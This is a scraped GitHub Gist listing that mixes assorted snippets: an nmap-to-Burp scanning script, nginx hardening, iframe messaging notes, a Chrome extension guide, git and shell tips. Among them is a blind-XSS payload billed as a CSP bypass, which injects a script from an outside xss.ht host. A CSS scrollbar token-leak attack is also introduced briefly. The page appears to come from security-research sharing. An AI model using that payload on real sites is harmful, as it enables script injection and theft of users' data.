Skip to content

Instantly share code, notes, and snippets.

@jgamblin
jgamblin / nmapburp.sh
Created Sep 6, 2018
NMap a network and send all open web servers to Burp.
View nmapburp.sh
#!/bin/bash
#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.
sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}')
for site in $sites
do
curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1
printf "Scanning %s with burp.\\n" "$site"
done
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active Dec 22, 2020
BXSS - CSP Bypass with Inline and Eval
View gist:311cf3981fda8303d65c27316e69209f
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
View scrollbar.md

CSS Scrollbar attack

Image we have the following code:

<script>
var TOKEN="abcdef";
</script>
@arcadia168
arcadia168 / exportsafarireadinglist.sh
Last active Jan 19, 2020
Export Safari's Reading List to Pocket/Evernote (or any service with an "email content in" feature)
View exportsafarireadinglist.sh
#!/bin/bash
# Script to export Safari's reading list into a text file, then import this into Pocket or Evernote (or any service with a "email in content" feature).
# First take all of Safari's Reading List items and place them in a text file.
/usr/bin/plutil -convert xml1 -o - ~/Library/Safari/Bookmarks.plist | grep -E -o '<string>http[s]{0,1}://.*</string>' | grep -v icloud | sed -E 's/<\/{0,1}string>//g' > readinglistlinksfromsafari.txt
# Now loop over each of those URls within that text file and add them to pocket.
while IFS= read -r line
do
echo $line
@pbojinov
pbojinov / README.md
Last active May 6, 2021
Two way iframe communication- Check out working example here: http://pbojinov.github.io/iframe-communication/
View README.md

Two way iframe communication

The main difference between the two pages is the method of sending messages. Recieving messages is the same in both.

Parent

Send messages to iframe using iframeEl.contentWindow.postMessage Recieve messages using window.addEventListener('message')

iframe

View simple-https-server.py
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
@plentz
plentz / nginx.conf
Last active May 7, 2021
Best nginx configuration for improved security(and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@jjperezaguinaga
jjperezaguinaga / chrome.md
Created Dec 9, 2012
Understanding Google Chrome Extensions
View chrome.md

#Introduction

Developing Chrome Extensions is REALLY fun if you are a Front End engineer. If you, however, struggle with visualizing the architecture of an application, then developing a Chrome Extension is going to bite your butt multiple times due the amount of excessive components the extension works with. Here are some pointers in how to start, what problems I encounter and how to avoid them.

Note: I'm not covering chrome package apps, which although similar, work in a different way. I also won't cover the page options api neither the new brand event pages. What I explain covers most basic chrome applications and should be enough to get you started.

Table of Contents

  1. Understand the Chrome Architecture
  2. Understand the Tabs-Extension Relationship
  3. Picking the right interface for the job
View README.md

agnoster.zsh-theme

A ZSH theme optimized for people who use:

  • Solarized
  • Git
  • Unicode-compatible fonts and terminals (I use iTerm2 + Menlo)

For Mac users, I highly recommend iTerm 2 + Solarized Dark

@piscisaureus
piscisaureus / pr.md
Created Aug 13, 2012
Checkout github pull requests locally
View pr.md

Locate the section for your github remote in the .git/config file. It looks like this:

[remote "origin"]
	fetch = +refs/heads/*:refs/remotes/origin/*
	url = git@github.com:joyent/node.git

Now add the line fetch = +refs/pull/*/head:refs/remotes/origin/pr/* to this section. Obviously, change the github url to match your project's URL. It ends up looking like this: